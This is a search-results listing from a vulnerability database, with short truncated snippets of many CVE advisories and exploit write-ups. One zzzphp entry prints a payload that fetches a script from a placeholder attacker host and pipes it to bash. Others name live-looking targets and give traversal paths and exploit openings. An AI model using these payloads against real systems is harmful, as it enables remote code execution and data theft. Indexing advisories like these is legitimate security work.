56796 matches found
Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641)
Source: http://drops.wooyun.org/papers/9809 Microsoft Office memory corruption vulnerability 0x01 Vulnerability overview In April this year Microsoft patched a Word type confusion vulnerability named CVE-2015-1641; an attacker can craft an RTF document with an embedded docx to carry out an attack. When Word parses a docx document and handles the displacedByCustomXML attribute, it does not validate the customXML object, so other tag objects can be passed in for processing, causing type confusion and leading to an arbitrary memory write; ultimately, carefully crafted tags and corresponding attribute values can achieve remote arbitrary code execution. According to Microsoft's official MS15-33 security bulletin, this vulnerability affects Office 2007...
zenphoto 1.4.3.3 - Multiple Vulnerabilities
No description provided by source. waraxe-2012-SA096 - Multiple Vulnerabilities in Zenphoto 1.4.3.3 =============================================================================== Author: Janek Vind waraxe Date: 03. November 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-96.html...
Remote Code Execution in CouchDB(CVE-2017-12635)
There was a vulnerability in CouchDB caused by a discrepancy between the database’s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remo...
ProFTPD Multiple Module Directory Traversal and Buffer Overflow Vulnerabilities
BUGTRAQ ID: 44562 CVE ID: CVE-2010-3867 ProFTPD is an open-source FTP server program. The pr_netio_telnet_gets function in ProFTPD's src/netio.c has a stack overflow when handling user input that contains Telnet IAC escape sequences; a remote attacker can submit malicious input to the FTP or FTPS service to cause arbitrary code execution. In addition, the mod_site_misc module has multiple input validation errors, which an attacker can use in a directory traversal attack to write or delete arbitrary directories, create symbolic links, or change file times. ProFTPD Project ProFTPD 1.3.x Vendor patch: ProFTPD Project...
Yonyou Zhiyuan A6 /yyoa/DownExcelBeanServlet Sensitive Information Disclosure
Yonyou Zhiyuan A6 collaboration system. Affected link: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&perid=0 This is a privilege only the system administrator should have, but any user can access it. It allows downloading the personal information of all employees, including ID card numbers, contact details, positions and other sensitive information. Taking a certain company as an example, accessing directly: http://oa.juntongtongxin.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&perid=0...
YXcms Backend SQL Injection Vulnerability
...
Apache mod_proxy Reverse Proxy Exposure
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache HTTP Server Security Advisory ==================================== Title: mod_proxy reverse proxy exposure CVE: CVE-2011-3368 Date: 20111005 Product: Apache HTTP Server Versions: httpd 1.3 all versions, httpd 2...
Third-Party Component Vulnerability in a Government Intelligent Search Engine Allows Browsing of Arbitrary Drive Directories + Default Backend Password
Brief description: A third-party component vulnerability in a government intelligent search engine allows browsing of arbitrary drive directories, plus a default backend password. Detailed description: The 爱觅桔 intelligent search engine is a "knowledge-providing search engine" developed independently by 中科汇联, pioneering knowledge graph association, colloquial-phrase matching, intelligent guidance, custom box computing and other special search features; it uses semantic understanding and machine learning technology to implement intelligent search, document search and multimedia search. Vulnerability 1: Third-party component invoked without authorization checks. The site uses a jQuery plugin that displays local files, jQuery File Tree; the files are jquery.js (jQuery core library), jqueryFileTree.js (jqueryFileTree core library), jqueryFileTree.jsp...
Yonyou System Vulnerability (SSRF & Java Deserialization Command Execution Vulnerability)
Brief description: 1. SSRF intranet information sniffing; 2. Java deserialization command execution: obtain system privileges. Detailed description: The Yonyou private cloud operations center http://219.232.202.154:8080//home has WebLogic deployed: Proof of vulnerability: 1. SSRF The default search page has it: combined with http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html, testing with localhost as an example: 2. Java deserialization command execution Test EXP:...
Vacron NVR Remote Command Execution
Vulnerability Summary The following advisory describes a remote command execution vulnerability. VACRON Specializing in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other...
RealVNC Authentication Bypass
No description provided by source. $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms...
S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command. Sound detection methodthe detection method by the constant...
Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly...
PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the...
ASUS RT-N16 - Text-plain Admin Password Disclosure
Description ----------- Several ASUS routers include reflected Cross-Site Scripting CWE-79 and authentication bypass CWE-592 vulnerabilities. An attacker who can lure a victim to browse to a web site containing a specially crafted JavaScript payload can execute arbitrary commands on the router as...
Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
Bugtraq ID: 49957 CVE ID: CVE-2011-3368 Apache HTTP Server is an open-source HTTPD server program. The Apache HTTP Server mod_proxy module has a security vulnerability that allows a malicious user to bypass certain security restrictions. The vulnerability affects mod_proxy when it is configured in reverse proxy mode: because some web requests are handled incorrectly, an attacker can construct a specially crafted URL to send malicious requests to unintended servers behind the proxy. Successful exploitation requires "ProxyPassMatch" and "RewriteRule" configuration directives that use certain pattern matching. Apache 2.0.x Apache 2.2.x Vendor solution...
ISC BIND 9 'libdns' Remote Denial of Service Vulnerability (CVE-2013-2266)
Bugtraq ID: 58736 CVE ID: CVE-2013-2266 ISC BIND is an implementation of the DNS protocol. ISC BIND has a security vulnerability that allows a remote attacker to send specially crafted requests that make the target named service consume large amounts of memory while processing regular expressions, crashing the system. BIND 9.6.x and 10.x are not affected by this vulnerability. In addition, the vulnerability only affects Unix and related operating systems; Windows-based versions are not affected. ISC BIND 9.7.x, 9.8.0 - 9.8.5b1, 9.9.0 - 9.9.3b1 Vendor solution ISC BIND 9.8.4-P2, 9.9.2-P and later versions have fixed this vulnerability; users are advised to download...
AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability
No description provided by source. HYIP ACME Version SQL Injection Vulnerability ======================================================== Author: Hussin X = = Home : www.tryag.cc/cc = = email: darkangelg85atYahooDoTcom = hussin.xathotmailDoTcom = =...
Jax Guestbook 3.31/3.50 - 'jax_guestbook.php' Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28523/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of a...
zzzcms zzzphp parserIfLabel Template Injection Remote Code Execution Vulnerability (CVE-2021-32605)
curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...
iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit
No description provided by source. <!-- iMesh <= 7.1.0.x IMWebControl Class IMWeb.dll 7.0.0.x remote heap exploit IE7/XP full patched by rgod, site: http://retrogod.altervista.org/ software site: http://www.imesh.com "iMesh is a file sharing and online social network. It uses a proprietary,...
An Analysis of the OpenSSL SSL Handshake Error State Security Bypass (CVE-2017-3737)
OpenSSL is a widely used library for SSL and TLS protocol implementation that secures data using encryption and decryption based on cryptographic functions. However, a Security Bypass vulnerability – recently addressed in a patch by the OpenSSL Project –can be exploited to make vulnerable SSL...
Samba: symlink race permits opening files outside share directory (CVE-2017-2619)
The Samba server is supposed to only grant access to the configured share directories unless the "wide links" are enabled, in which case the server is allowed to follow symlinks. The default since CVE-2010-0926 is that wide links are disabled. smbd ensures that it isn't following symlinks by...
Iceflow VPN /log/system.log Sensitive Information Disclosure Vulnerability
Because various log files on "ICEFLOW VPN Router" devices can be accessed without authorization, sensitive system information can be disclosed (including the session value after a successful login). System log http://url/log/system.log VPN log http://url/log/vpn.log Mobile user log http://url/log/mobile.log Firewall log http://url/log/firewall.log Access log http://url/log/access.log Alarm log http://url/log/warn.log Error log http://url/log/error.log...
Sendmail CA SSL Certificate Validation Vulnerability
BUGTRAQ ID: 37543 CVE ID: CVE-2009-4565 Sendmail is a mail transfer agent (MTA) used by many large sites. Sendmail does not correctly validate null characters (\0) in the domain name of the Common Name (CN) field of an X.509 certificate subject; when handling a certificate field containing a null character it wrongly treats the null as a terminator, so only the part before the null is validated. For example, for a name like the following: example.com\0.haxx.se...
DokuWiki fetch.php SSRF vulnerability
Author: baolongniucow protection Dragon About DokuWiki DokuWiki is an open source wiki engine program, running on PHP environment. DokuWiki program small but powerful, flexible, suitable for small teams and personal web site Knowledge Base management. Vulnerability description DokuWiki latest...
Weaver OA sysinterface/codeEdit.jsp Page Arbitrary File Upload
0x01 Vulnerability overview Vendor: Weaver OA Official homepage: http://www.weaver.com.cn/ Disclosure date: 2015-11-25 Vulnerability type: unauthorized access / privilege bypass Files can be uploaded without logging in. http://localhost:8088/sysinterface/codeEdit.jsp?filename=5308.java&filetype=java filename is the file name; when it is empty the file is created automatically. 0x02 Exploitation Code details String fileid = "Ewv"; String readonly = ""; boolean isCreate = false;...
Eclipse Jetty Information Disclosure Vulnerability (CVE-2021-28169)
...
Apache Tomcat Security Bypass Vulnerability(CVE-2018-1305)
Vendor: The Apache Software Foundation Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.4 Apache Tomcat 8.5.0 to 8.5.27 Apache Tomcat 8.0.0.RC1 to 8.0.49 Apache Tomcat 7.0.0 to 7.0.84 Description: Security constraints defined by annotations of Servlets were only applied once a Servlet had been...
Ubuntu PAM 1.1.0 MOTD - Local Root Exploit
No description provided by source. #!/bin/bash Exploit Title: Ubuntu PAM MOTD local root Date: July 9, 2010 Author: Anonymous Software Link: http://packages.ubuntu.com/ Version: pam-1.1.0 Tested on: Ubuntu 9.10 Karmic Koala, Ubuntu 10.04 LTS Lucid Lynx CVE: CVE-2010-0832 Patch Instructions: sudo...
Apache mod_proxy_ftp Module Remote Command Injection Vulnerability
BUGTRAQ ID: 36254 CVE ID: CVE-2009-3095 Apache HTTP Server is a popular web server. The mod_proxy_ftp module of the Apache server has a remote command injection vulnerability. In a reverse proxy configuration, a remote attacker can exploit this vulnerability by creating a specially crafted HTTP Authorization header to bypass intended access restrictions and send arbitrary commands to the FTP server. Apache Group Apache 2.2.x Vendor patch: Apache Group ------------ The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:...
Apache 2.2.x Scoreboard Local Security Restriction Bypass Vulnerability
BUGTRAQ ID: 51407 CVE ID: CVE-2012-0031 Apache HTTP Server is an open-source web server from the Apache Software Foundation that runs on most computer operating systems; because it is cross-platform and secure it is widely used and is one of the most popular web server programs. A child process in Apache HTTP Server can change the memory type record of the scoreboard shared-memory segment, which can be exploited to cause an invalid free operation when the parent process shuts down, allowing a local attacker to bypass certain security restrictions. Apache 2.2.x Vendor patch: Apache Group ------------...
HFS HTTP File Server Arbitrary File Upload Vulnerability
HTTP File Server is an HTTP-based file server program. HTTP File Server does not properly filter user-submitted file data; a remote attacker can exploit the vulnerability in a directory traversal attack to upload files to arbitrary target folders. Using a file name of the form '../' bypasses the directory restriction and uploads files to arbitrary locations on the system. HTTP File Server HTTP File Server 2.2a HTTP File Server HTTP File Server 2.2 Upgrade: HTTP File Server HTTP File Server 2.2a HTTP File Server HTTP File Server 2.2b...
Kangle Virtual Host Local File Inclusion Vulnerability
Test environment: kangle-3.3.9.msi, ep-2.6.4.exe (official update of April 18), Windows XP. First install kangle server, then install easypanel; after installation, visiting http://127.0.0.1:3312/ automatically redirects to http://127.0.0.1:3312/vhost/?c=session&a=loginForm. Then log in with any username and password; the request sent is shown in the figure: then modify the value of parameter c in the request URL, changing session to: C=../../../../../../../../../../../windows/system.ini%00...
Samba 3.0.21-3.0.24 LSA trans names Heap Overflow
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
CKFinder 1.4.3 File Upload Vulnerability
CKFinder is a very popular foreign WYSIWYG text editor; its 1.4.3 asp.net version has an arbitrary file upload vulnerability that an attacker can exploit to upload arbitrary files. CKFinder 1.4.3...
EternalChampion - Windows SMB Remote Code Execution Vulnerability (CVE-2017-0146)
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 SMBv1 server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server. To exploit the vulnerability, in most...
Thinkphp 3.2.3 Latest Version update Injection Vulnerability
Original from Anquanke, author: 0r3ak@0kee Team Original: Brief description thinkphp is a well-known Chinese PHP development framework with complete development documentation, based on the MVC architecture; Thinkphp3.2.3 is currently the most widely used thinkphp version. Although development of new features has stopped, its adoption is higher than the newer thinkphp5 series. Because the framework concatenates SQL statements when updating data with update in its secure database implementation, and a passed-in array is not filtered, SQL injection results. Git patch update Added the BIND expression Vulnerability details...
WordPress Core 4.6 - Unauthenticated Remote Code Execution
============================================= - Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - CVE-2016-10033 - Release date: 03.05.2017 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY -----------------------...
Web Wiz Forums String Filtering SQL Injection Vulnerability
Web Wiz Forums is an ASP-based web application. Web Wiz Forums does not properly filter user-submitted input; a remote attacker can exploit the vulnerability in a SQL injection attack to obtain sensitive information. The problem is that the 'page.asp' script lacks filtering of the user-submitted 'NewsID' parameter; submitting malicious SQL code as parameter data can change the original SQL logic and obtain sensitive information. Web Wiz Forums versions before 8.05a Upgrade to the latest version: http://www.webwizguide.info/news/newsitem.asp?NewsID=103 form method="post"...
Dahua DVR 2.608.0000.0 and 2.608.GV00.0 - Authentication Bypass
No description provided by source. Dahua DVR Authentication Bypass - CVE-2013-6117 --Summary-- Dahua web-enabled DVRs and rebranded versions do not enforce authentication on their administrative services. Zhejiang Dahua Technology Co., Ltd. http://www.dahuasecurity.com --Affects-- Dahua web-enabl...
Yappa-NG Admin_Module_Deldir.Inc.PHP Remote File Inclusion Vulnerability
Yappa-NG is a PHP-based web application. Yappa-NG does not properly filter user-submitted URI data; a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Admin_Module_Deldir.Inc.PHP' script lacks filtering of the user-submitted 'config[path_src_include]' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with web process privileges. yappa-ng yappa-ng 2.3.1 yappa-ng yappa-ng 2.3 .0 yappa-ng yappa-ng 2.2.2 yappa-ng yappa-ng 2.2.1 yappa-ng yappa-...
Linux Kernel TUNSETIFF Use-After-Free Local Denial of Service Vulnerability (CVE-2013-4343)
BUGTRAQ ID: 62360 CVE(CAN) ID: CVE-2013-4343 Linux Kernel is the kernel of the Linux operating system. Linux kernel 3.11 and earlier have a local denial of service vulnerability when initializing a tuntap interface; an attacker can exploit it with an invalid name to crash the kernel. Linux kernel <= 3.11 Vendor patch: Linux ----- The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage: http://www.kernel.org/ http://permalink.gmane.org/gmane.linux.kernel/1559873...
FanRuan V9 Unauthorized RCE Vulnerability
...
Network Time Protocol Trap Crash Denial of Service Vulnerability(CVE-2016-9311)
Summary An exploitable denial of service vulnerability exists in the trap functionality of ntpd. If an ntpd instance is configured to send traps, a specially crafted network packet can be used to cause a null pointer dereference resulting in a denial of service. This vulnerability can be triggere...
com_extcalendar Mambo Component <= 2.0 Include Vulnerability
No description provided by source. -------------------------------------------------------------------------------- Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities Discovered By OLiBekaS ----------------------------------------------------------------------------- dork :...
CKEditor 4.0.1 Multiple Security Vulnerabilities
CKEditor is an online text editor. CKEditor has multiple security vulnerabilities that allow an attacker to perform cross-site request forgery, cross-site scripting attacks and obtain path information. CKEditor 4.0.1 Vendor solution No detailed solution is currently available: http://ckeditor.com/ =========================================== Vulnerable Software: ckeditor 4.0.1 standard Download:...
Huawei Echo Life HG8247 HTML Injection Vulnerability
Bugtraq ID: 66594 CVE ID: CVE-2014-0337 Huawei Echo Life HG8247 is an optical fiber router. Huawei Echo Life HG8247 optical router version V1R006C00S120 has a stored cross-site scripting vulnerability that allows an attacker to submit a malicious username to create a malicious entry in the "failed log-in attempts over telnet" log; when the malicious entry is viewed, sensitive information can be obtained or the user's session hijacked. Huawei Echo Life HG8247 Huawei Echo Life HG8247 HG8247...
Apache HTTP Server mod_proxy_ajp Denial of Service Vulnerability
CVE(CAN) ID: CVE-2011-3348 Apache HTTP Server is an open-source web server from the Apache Software Foundation that runs on most computer operating systems; because it is cross-platform and secure it is widely used and is one of the most popular web server programs. The mod_proxy_balancer implementation in Apache HTTP Server has a security vulnerability that a malicious user can exploit to cause a denial of service. The vulnerability stems from an error in mod_proxy_ajp's handling of malformed HTTP requests when it is used together with mod_proxy_balancer. By sending a specially crafted HTTP request, a backend server can be put into a failed state, causing a temporary DoS that lasts until the retry timeout expires. Apache Group...
Ghostscript remote code execution (CVE-2017-8291) (ghostbutt)
No description provided by source. %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /sizefrom 10000 def /sizestep 500 def /sizeto 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 sizefrom sizestep sizeto pop 1 add for /buffercount exch def /buffersizes buffercount array def 0 sizefrom...